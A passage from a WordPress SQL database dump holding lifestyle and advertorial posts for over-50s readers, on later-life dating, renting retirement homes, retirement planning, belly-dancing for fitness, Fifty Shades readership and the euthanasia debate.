own (or other peoples) glasses if pupils are dilating. So, it would appear that evolutionary theories have little to offer the older dater. If, with advancing age, we are no longer able to ‘judge the book by its cover’ maybe we take more time to get to know what is on the inside. And love (or lust) at first sight is only for the young.</p>&#13;\n<h5>In Blog 5: Getting to Know You<strong> <div class=\"woo-sc-hr\"></div></strong></h5>&#13;\n<p><img class=\"alignright  wp-image-2821\" title=\"Dr Lori Boul\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/08/Dr-Lori-Boul.jpg\" alt=\"\" width=\"119\" height=\"163\" /><em><strong><a href=\"http://www.drloriboul.com/\" target=\"_blank\">Dr. Lori Boul</a></strong></em> gained her PhD at the University of Sheffield in the UK and the research for her thesis, into ‘male menopause’, attracted worldwide media attention. Dr Lori is probably one of the most outspoken speakers on the topic of human sexuality and in writing her book <em><strong><a href=\"http://www.howtobooks.co.uk/display.asp?K=9781845284749&amp;sf_01=CAUTHOR&amp;sort=SORT_TITLE&amp;st_02=diy+sex&amp;sf_02=CTITLE&amp;sf_03=KEYWORD&amp;sf_04=identifier&amp;m=1&amp;dc=1\" target=\"_blank\">DIY Sex and Relationship Therapy</a></strong></em> has dared to challenge the need for face-to-face therapy. According to Dr Lori, “Good therapists can be hard to find and for many people a good spoonful of common sense is all that is needed”.</p>&#13;\n<p>Whether speaking to the general public or professionals, Dr Lori’s expertise, sensitivity and humour inspire new ways of thinking about relationships, sex and psychology. She has presented talks at national and international conferences, provides training courses and executive mentoring, and is featured as a regular guest speaker with Cunard.</p>&#13;\n<h5><a href=\"http://www.drloriboul.com/\" target=\"_blank\"> www.drloriboul.com</a> <div class=\"woo-sc-hr\"></div></h5>&#13;\n<p> </p>&#13;\n									</div>','Love or Lust at First Sight?','Psychology of Love - Part 4 Since research suggests that we decide whether or not we like a person in the first 30 seconds of meeting them, it would appear the','publish','open','open','','love-or-lust-at-first-sight','','','2018-04-02 20:04:36','2018-04-02 20:04:36','',0,'http://westonspirit.org.uk/love-or-lust-at-first-sight.asp',0,'post','',0),(240,1,'2015-01-12 19:20:13','2015-01-12 19:20:13','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">26 August 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2012/08/own-your-future-3/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2012/08/own-your-future-3/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2012/08/own-your-future-3/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2012/08/own-your-future-3/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2012/08/own-your-future-3/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Dreaming of the perfect retirement home but reluctant to sell your property? It’s time to wake up to the benefits of renting…</h4>&#13;\n<p><img width=\"300\" height=\"278\" src=\"/wp-content/uploads/2012/08/Copy-of-joanneclairdesignmagshots-photoshopped.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Finding a practical solution that matches the quality of your retirement living dream may be easier said than done – and renting may not automatically spring to the top of your list of possible solutions.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">However, increasing numbers of UK retirees are discovering what their counterparts in America and Australia found out a few years back – that renting your retirement home offers many advantages over continued property ownership.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Even more are discovering how you can continue to benefit from both.Hawthorns Retirement has brought its highly successful American formula for retirement living to the UK at Eastbourne, Clevedon and Braintree.</p>&#13;\n<h3 class=\"para para_$ID/NormalParagraphStyle\">A flexible lifestyle</h3>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">These developments, in a nutshell, offer you continued independent living, none of the worries of home ownership and total flexibility to change your lifestyle at a month’s notice should circumstances dictate. And all this is achieved by renting your retirement home at The Hawthorns.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Your monthly rental includes all your many monthly expenses including all your meals and snacks, utility bills, housekeeping, maintenance – even a free minibus to take you to the shops and back. If you sit down and calculate what you are spending on all those items living in your own home, the rental fees appear very reasonable indeed.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">As well as the financial argument, life at The Hawthorns offers the added benefits of security, companionship and the flexibility of handing in just one month’s notice of your decision to leave.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">While many residents fund this idyllic retirement lifestyle from the proceeds of the sale of their home, many others opt to rent out their own property and fund their new-found lifestyle from the rental income, maintaining their property as part of their estate.</p>&#13;\n<h3 class=\"para para_$ID/NormalParagraphStyle\">It was easy for Alan and Jean</h3>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">For Alan and Jean Ward (not pictured), the decision to move to The Hawthorns in Braintree was swift in the extreme. They saw an advert for the development in a paper on a Sunday morning, visited in the afternoon and signed on the dotted line the next day following a second visit.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Their decision to rent out their existing property rather than sell it was almost as quick, as Alan explains.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">“Jean has Parkinson’s, I suffer with arthritis and the thought of not having to worry about shopping, cooking and all the other home maintenance chores suddenly sounded so appealing. We loved The Hawthorns the moment we stepped inside so it was an easy as well as swift decision.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">“I have to admit my initial thought was to sell our own home, a three-bedroom detached bungalow in Tiptree, but after a chat with our son we realised it made more sense to rent out our bungalow. The rental income from that subsidises our rent at The Hawthorns and enables us to enjoy not only a fabulous but an affordable lifestyle.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">“Of course, it makes complete sense at the moment to rent out the bungalow. With the housing market in the doldrums, I can wait two or three years for prices to pick up and then consider selling it and getting much more capital for it – very appealing.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">“What’s more, we always know we still have our old home should we ever wish to return to it – which I have to say is highly unlikely, the way we feel about life here,” said Alan. </p><div class=\"woo-sc-hr\"></div>&#13;\n<h5 class=\"para para_$ID/NormalParagraphStyle\"> <em>0845 450 1814</em></h5>&#13;\n<h5 class=\"para para_$ID/NormalParagraphStyle\"><a href=\"http://www.hawthornsretirement.co.uk/\" target=\"_blank\"><em>www.hawthornsretirement.co.uk</em></a></h5>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\"></p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Own your future','Dreaming of the perfect retirement home but reluctant to sell your property? It’s time to wake up to the benefits of renting... Finding a practical','publish','open','open','','own-your-future-2','','','2018-04-02 20:04:35','2018-04-02 20:04:35','',0,'http://westonspirit.org.uk/own-your-future-2.asp',0,'post','',0),(241,1,'2014-04-07 15:40:00','2014-04-07 15:40:00','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">26 August 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Planning pays off\" st_url=\"http://westonspirit.org.uk/2012/08/planning-pays-off/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Planning pays off\" st_url=\"http://westonspirit.org.uk/2012/08/planning-pays-off/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Planning pays off\" st_url=\"http://westonspirit.org.uk/2012/08/planning-pays-off/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Planning pays off\" st_url=\"http://westonspirit.org.uk/2012/08/planning-pays-off/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Planning pays off\" st_url=\"http://westonspirit.org.uk/2012/08/planning-pays-off/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Make sure you plan for retirement properly and well in advance – otherwise you risk losing out</h4>&#13;\n<p><img width=\"596\" height=\"397\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/08/Copy-of-125183558.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Only 36 per cent of employers provided pre-retirement planning help for employees, despite the fact that 70 per cent of recipients said it was useful, insurance company Aviva’s Real Retirement report found. The most popular forms of support were workshops and literature on retirement finances, followed by the provision of a dedicated member of staff with whom to discuss the issues, and a list of recommended financial advisers.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Clive Bolton, ‘at retirement’ director at Aviva, says: “In order to motivate and retain staff many employers invest in pensions and other benefits, but then left staff drift away at retirement without providing any advice or support.”</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">If you are coming up to retirement, check your contract or ask the human resources department if you are entitled to any help. If not, it could be worth making the case for receiving some, pointing out that failure to provide it could mean the company loses out.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Labour market figures show that almost a third of people who qualify for the state pension are still looking for work, even if only on a part-time basis. As a result companies that offer employees the option of part-time or flexible work could avoid them walking away and taking valuable skills and experience with them. What’s more, says Bolton, “Employers who help long-term employees feel secure about later-life finances are likely to benefit from increased staff engagement and productivity.”</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Millionaire men</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">The average worker will have earned £1m by the age of 56 according to insurer Prudential.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Most men who earn the average income for their age bracket from age 18 to 65 will have earned the sum before tax by the time they are 51, but women have to wait 22</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">years longer.</p>&#13;\n									</div>','Planning pays off','Make sure you plan for retirement properly and well in advance – otherwise you risk losing out Only 36 per cent of employers provided pre-retirement','publish','open','open','','planning-pays-off','','','2018-04-02 20:04:33','2018-04-02 20:04:33','',0,'http://westonspirit.org.uk/planning-pays-off.asp',0,'post','',0),(242,1,'2017-12-17 11:55:46','2017-12-17 11:55:46','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">26 August 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Putting the fun into fitness\" st_url=\"http://westonspirit.org.uk/2012/08/putting-the-fun-into-fitness-2/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Putting the fun into fitness\" st_url=\"http://westonspirit.org.uk/2012/08/putting-the-fun-into-fitness-2/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Putting the fun into fitness\" st_url=\"http://westonspirit.org.uk/2012/08/putting-the-fun-into-fitness-2/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Putting the fun into fitness\" st_url=\"http://westonspirit.org.uk/2012/08/putting-the-fun-into-fitness-2/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Putting the fun into fitness\" st_url=\"http://westonspirit.org.uk/2012/08/putting-the-fun-into-fitness-2/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>It’s no surprise that exercise is important, but how can we keep it interesting? Belly-dancing is the answer, claims Maureen Paton, who shares with us its bountiful benefits</h4>&#13;\n<p><img width=\"283\" height=\"600\" src=\"/wp-content/uploads/2012/08/bellydancer1.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">I came very late to the idea of exercise, having ignored it for decades until I reached an ‘interesting’ age and realised I urgently needed some elder-exercise to oil those madly creaking joints. Yet although strength exercises build up older muscles and increase your metabolism, which helps to keep weight and blood sugar in check, who wants to start pumping iron for the first time alongside driven young things at the gym? Me neither. So the challenge was to find an enticing alternative that offered specific benefits for older people. One obvious solution was dancing, since it’s a classic endurance exercise that increases the heart rate by putting the fun into fitness. But although I’m a huge Strictly fan, I’ve always been hopeless at the partnered kind of dancing after dreadful memories of stiff school ballroom classes (remember those?) with reluctant, sweaty-palmed boys. I also have arthritic knees, inherited from my mother, so lots of Latino stamping around in such emphatic dances as the uber-trendy salsa is a no-no.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">But then I discovered the solo delights of belly-dancing… a revelation, since it lures you in with glamorous costumes and absurdly seductive music. Crucially, it exercises the whole body from top to toe, starting with the warm-up shimmying and then progressing to the waving “snake�? arms and fingers and the “camel�? dances that imitate the swaying movements of desert dromedaries rather more elegantly (you hope). As a non-impact, weight-bearing exercise, it’s excellent for helping to prevent osteoporosis and for improving flexibility, especially in the spine with a repertoire of full-body, undulating moves that lengthen and strengthen the spinal column. Who would have thought that something, which frankly looks so frivolous, could make us all so fit?</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">“You? Belly-dancing?�? scoffed an outspoken friend when she heard about my new passion. “But you haven’t got a belly to dance with!�? It’s true that I had managed to lose some excess tummy-weight, but boy, do I still have womanly hips; I’m the original hipster. And in fact belly-dancing is something of a misnomer for what is really the groovy art of hip-dancing. My boyfriend has nicknamed it “hip-chopping�? because of one particularly rapid up-and-down hip movement which fans out to emulate the cutting of a cake into slices – and which does wonders for the glutes, by the way. So all you really need for this highly addictive exercise is a functioning pair of hips (or hip replacements), which means that all shapes and sizes can have a go.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">That’s the great thing about belly-dancing: it’s tremendously inclusive. Some of us look like stately galleons in full sail, while others are more like Popeye’s Olive Oyl; and that’s all absolutely fine. One seventy-something woman comes to our classes with her twenty-something granddaughter, so it can be a great activity for bringing the generations together. It’s creative enough to encourage improvisation, and I defy anyone not to get the giggles at one point – especially with some of the camper costumes. Whenever I’m guilty of a mutton-dressed-as-lamb fashion disaster, I know just where I can wear it without frightening the horses or offending the age police.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">For belly-dancing is a great excuse to bring on the bling by wearing floaty hippie-style skirts and hip-sashes with those rows of tiny coins whose instantaneous rattle shows you whether you’re shimmying fast enough. I brought back some cossies from holidays in Spain and Turkey as well as from my local London market in Camden Lock, while one very tall and rangy English teacher in my class swapped her usual trackie bottoms for a magenta-coloured pair of harem pants with matching jewelled Madonna bodice like twin rockets, giving us a tantalising glimpse of a startling personality change. It’s a dance like no other: you really can reinvent yourself.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">The beauty of belly-dancing was summed up best by my friend Sue, 55, who pointed out that it’s the only class in our gym where the participants socialise afterwards. And of course you’ll never be short of a conversational show-stopper when people ask what you do for a hobby… “It’s very free and very feminine – and it’s also very sensual in a controlled way without being sluttish,�? says devotee Eve, 60. “No one is judging you – and there’s a lot of camaraderie.�?</p>&#13;\n									</div>','Putting the fun into fitness','It’s no surprise that exercise is important, but how can we keep it interesting? Belly-dancing is the answer, claims Maureen Paton, who shares with us its','publish','open','open','','putting-the-fun-into-fitness','','','2018-04-02 20:04:32','2018-04-02 20:04:32','',0,'http://westonspirit.org.uk/putting-the-fun-into-fitness.asp',0,'post','',0),(243,1,'2018-03-04 07:43:41','2018-03-04 07:43:41','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">26 August 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"She’s reading it. Are you?\" st_url=\"http://westonspirit.org.uk/2012/08/shes-reading-it-are-you/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"She’s reading it. Are you?\" st_url=\"http://westonspirit.org.uk/2012/08/shes-reading-it-are-you/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"She’s reading it. Are you?\" st_url=\"http://westonspirit.org.uk/2012/08/shes-reading-it-are-you/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"She’s reading it. Are you?\" st_url=\"http://westonspirit.org.uk/2012/08/shes-reading-it-are-you/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"She’s reading it. Are you?\" st_url=\"http://westonspirit.org.uk/2012/08/shes-reading-it-are-you/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Ellen Bennett discovers how and why the phenomenal success of the Fifty Shades trilogy has been driven by women over 50</h4>&#13;\n<p><img width=\"596\" height=\"403\" src=\"/wp-content/uploads/2012/08/Old-reader.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Sexual intercourse began in 1963,” according to the poet Phillip Larkin. So by his reckoning, the first generation of sexually liberated women are now comfortably into their 50s and 60s. Small wonder, then, that these women are driving a seismic shift in the way society thinks and talks about sex.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">From reading matter through to hobbies, dating and even bedroom activities, women’s expectations and boundaries are shifting. This first caught the public imagination with the runaway success of the soft-porn pot-boiler Fifty Shades of Grey by EL James, but experts say it’s symptomatic of a much more fundamental change.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Responding to demand</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Last week, news hit the tabloid front pages that a provider of audiobooks to the visually impaired, Calibre Audio Library, had been inundated with calls from readers looking for the Fifty Shades trilogy – most of them older women. Calibre’s head of audiobook production, Christine Ronaldson, said: “We have to respond to what our members want to read. Our decision to add this popular series reflects this. We believe that people who are visually impaired should have the same access to books as sighted people.”</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">It’s not just in the bookshop that women’s habits are changing. As relationship patterns evolve, with more single and divorced people than ever before, a raft of online dating sites catering specifically to the over-50s market has launched. According to one, seniordatingroup.co.uk: “Technological advances and a surge in over-50s hitting the internet has caused a surge in senior dating enthusiasts.” Other websites for the over 50s include undertheclock.co.uk, datingover50s.co.uk and over50sdates.co.uk.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Women who find themselves single late in life, whether through divorce or widowhood, no longer feel that their romantic life is necessarily over. Paul Fitzpatrick, head of marketing for Datingagency.com, says: “When online dating first became popular, it was seen to be geared almost exclusively to first generation daters. But long gone are these days as this is the age of the ‘silver surfer’. Today’s over fifties are tech savvy, adventurous and aren’t afraid to put themselves out there.”</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Fuelling a shift</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Sex therapist and author Gina Ogden believes the ready availability of information and entertainment relating to sexuality is fuelling a shift in women’s attitudes. “Women over 50 are redefining</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">themselves,” she says. “The old message that life ends when the menopause begins is 100 years out of date. We are broadening the notion of sex.”</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Ogden says Fifty Shades of Grey has been just one part of this “glut of information” – “it was like dropping a pebble into a huge pond that was already there, and that really resonating and rippling out,” she says.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">As the population ages, there are more women over 50 than ever before, and those women are more healthy and active than their predecessors. Hormone replacement therapy is mitigating the effects of the menopause for many women, while Viagra is keeping their</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">male partners sexually active well into their later decades.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">The sociological changes of the 60s and 70s are reverberating through the decades to be felt today. It was this generation of woman that first took the pill, that pioneered working mothers and free love. Now they’re reaching retirement, they’re redefining boundaries once again. “Even those women that weren’t liberated themselves in the 60s and 70s have some kind of history to look back on,” says Ogden.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">“I have a friend who did something I thought was mad, and she said to me – “I never got over the fact I wasn’t at Woodstock”.”</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">With their children fully grown and independent, their successful careers drawing to a close or behind them, and their independence intact, many</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">mature women are having the</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">time of their lives. Phillip Larkin ended his poem with the words: “So life was never better than / In nineteen sixty-three.” Not anymore.</p>&#13;\n									</div>','She’s reading it. Are you?','Ellen Bennett discovers how and why the phenomenal success of the Fifty Shades trilogy has been driven by women over 50 Sexual intercourse began in 1963,”','publish','open','open','','shes-reading-it-are-you','','','2018-04-02 20:04:30','2018-04-02 20:04:30','',0,'http://westonspirit.org.uk/shes-reading-it-are-you.asp',0,'post','',0),(244,1,'2015-02-20 12:31:18','2015-02-20 12:31:18','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">26 August 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Society’s ethical dilemma\" st_url=\"http://westonspirit.org.uk/2012/08/societys-ethical-dilemma/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Society’s ethical dilemma\" st_url=\"http://westonspirit.org.uk/2012/08/societys-ethical-dilemma/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Society’s ethical dilemma\" st_url=\"http://westonspirit.org.uk/2012/08/societys-ethical-dilemma/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Society’s ethical dilemma\" st_url=\"http://westonspirit.org.uk/2012/08/societys-ethical-dilemma/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Society’s ethical dilemma\" st_url=\"http://westonspirit.org.uk/2012/08/societys-ethical-dilemma/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>The high court denied a man suffering from locked-in syndrome the right to die, bringing back to the fore the euthanasia debate</h4>&#13;\n<p><img width=\"300\" height=\"452\" src=\"/wp-content/uploads/2012/08/Tony-Nicklinson.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">The tragic case of Tony Nicklinson has thrust the ethical dilemma of euthanasia back into the limelight. Nicklinson, 58, died from natural causes last week after losing a High Court battle to be allowed assisted suicide. A second man known as Martin, 47, also lost, and is likely to raise a legal challenge.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Pressured decisions</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">The case has prompted heated debate among the media, church and medical professions – as well as the public (see vox pop, p13). Church leaders supported the ruling, with Rev Dr Brendan McCarthy, the Archbishop of Canterbury’s advisor on medical ethics, writing in the Telegraph: “It is naive to think that if some form of euthanasia were permitted, some individuals, vulnerable through age, illness or disability, would not be pressured into making a ‘voluntary’ decision to seek to have their lives ended.”</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Communicating through blinks, Nicklinson accused the judges in the case of cowardice. But what exactly are an individual’s rights and duties in relation to euthanasia?</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">The law as it stands is opaque, perhaps deliberately so. Euthanasia is against the law, and classed as a criminal act. There is distinction between passive and active euthanasia. Passive euthanasia, when treatment that the patient has not consented to is ended, has been allowed to pass without prosecution, as under the 1993 Bland case. Active euthanasia, when treatment is administered with the intention of ending the patient’s life, has led to prosecutions such as that of Dr Arthur in 1985. Dr Arthur, who administered a sedative to a severely-ill newborn baby, was acquitted.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Euthanasia is legal elsewhere in Europe, notably Switzerland, home of the Dignitas clinic for assisted death for those with terminal illnesses and severe physical and mental illnesses. About 180 British citizens are believed to have travelled to Dignitas to be helped to die. Martin, the second appellant in the Nicklinson case, wishes to travel to Dignitas.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Prosecution protection</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">However under government guidance, issued after the case of MS sufferer Debbie Purdy in 2010, only friends and relatives of the victim are likely to be protected from prosecution if they aid travel to Switzerland.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Professionals, for example a doctor, would be liable to face prosecution. Martin, whose wife is unwilling to help ?him to die, sought to overturn this ?guidance, but failed.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Individuals do have the option to write living wills, which set out their wishes regarding healthcare if they became seriously ill or incapacitated ?and unable to communicate. These advance decisions only apply to the right to refuse treatments, ?and not to be actively helped to die.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">The law surrounding euthanasia is expected to be subject to further judicial and parliamentary scrutiny following the public scrutiny prompted by Nicklinson’s life and death.</p>&#13;\n									</div>','Society’s ethical dilemma','The high court denied a man suffering from locked-in syndrome the right to die, bringing back to the fore the euthanasia debate The tragic case of Tony','publish','open','open','','societys-ethical-dilemma','','','2018-04-02 20:04:29','2018-04-02 20:04:29','',0,'http://westonspirit.org.uk/societys-ethical-dilemma.asp',0,'post','',0);
INSERT INTO `wp_posts` VALUES (245,1,'2016-07-27 03:10:43','2016-07-27 03:10:43','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">26 August 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"The best of both worlds\" st_url=\"http://westonspirit.org.uk/2012/08/the-best-of-both-worlds-2/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"The best of both worlds\" st_url=\"http://westonspirit.org.uk/2012/08/the-best-of-both-worlds-2/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"The best of both worlds\" st_url=\"http://westonspirit.org.uk/2012/08/the-best-of-both-worlds-2/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"The best of both worlds\" st_url=\"http://westonspirit.org.uk/2012/08/the-best-of-both-worlds-2/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"The best of both worlds\" st_url=\"http://westonspirit.org.uk/2012/08/the-best-of-both-worlds-2/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Deciding on a retirement home is easier than ever now you no longer have to choose between health care services and independence</h4>&#13;\n<p><img width=\"596\" height=\"398\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/08/Copy-of-IMG_3810.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_consumer%3aSponsored-body_drop_cap\">Some 460,000 people in Britain live in care homes. Rather more (550,000) are in sheltered housing. A far smaller but fast-growing number are choosing to rent or buy accommodation that seeks to combine the independence of one with the support structure of the other.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">The appeal is obvious. The leap between the two more standard forms of accommodation is huge. Care homes are not only expensive, and currently under some scrutiny, but they can also accelerate a loss of independence. Continuing Care Retirement Communities (CCRCs) allow, indeed encourage, you to retain independence as long as possible, but with the security blanket of a full range of services at hand.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">One illustrating their many advantages is Chantry Court in the pleasant Wiltshire market town of Westbury.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">It ticks all the boxes for older people (and their anxious families) looking for an option that is secure, designed with reduced mobility in mind, with no worries about maintenance and with a built-in community (if that is what you want) just outside your door.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">Added to this, Chantry Court has all the social and leisure facilities that make these such sustainable communities – restaurant, bar, lounge, bridge room, library, hair salon, therapy room, doctor’s surgery and even a cinema… which doubles up as an exercise room. And there’s a spacious guest suite.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">Moving from a family home doesn’t have to mean losing precious living space: the four penthouse units are 1200 sq ft each, the two bedroom apartments around 800 sq ft and one bed slightly smaller again. The feel is that of a well-appointed country hotel.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">Independent living apartments at Chantry Court are from £195,000 to buy, £146,250 on shared equity or rent from £295/week. Assisted living packages are from £395/week. </p><div class=\"woo-sc-hr\"></div>&#13;\n<h5 class=\"para para_consumer%3aSponsored-web_link\"><em>0800 0147552</em></h5>&#13;\n<h5 class=\"para para_consumer%3aSponsored-web_link\"><a href=\"http://www.chantrycourt.com/\" target=\"_blank\"><em>www.chantrycourt.com</em></a></h5>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n									</div>','The best of both worlds','Deciding on a retirement home is easier than ever now you no longer have to choose between health care services and independence Some 460,000 people in','publish','open','open','','the-best-of-both-worlds','','','2018-04-02 20:04:27','2018-04-02 20:04:27','',0,'http://westonspirit.org.uk/the-best-of-both-worlds.asp',0,'post','',0),(246,1,'2016-09-16 17:19:54','2016-09-16 17:19:54','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">26 August 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Too old to break a taboo?\" st_url=\"http://westonspirit.org.uk/2012/08/too-old-to-break-a-taboo/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Too 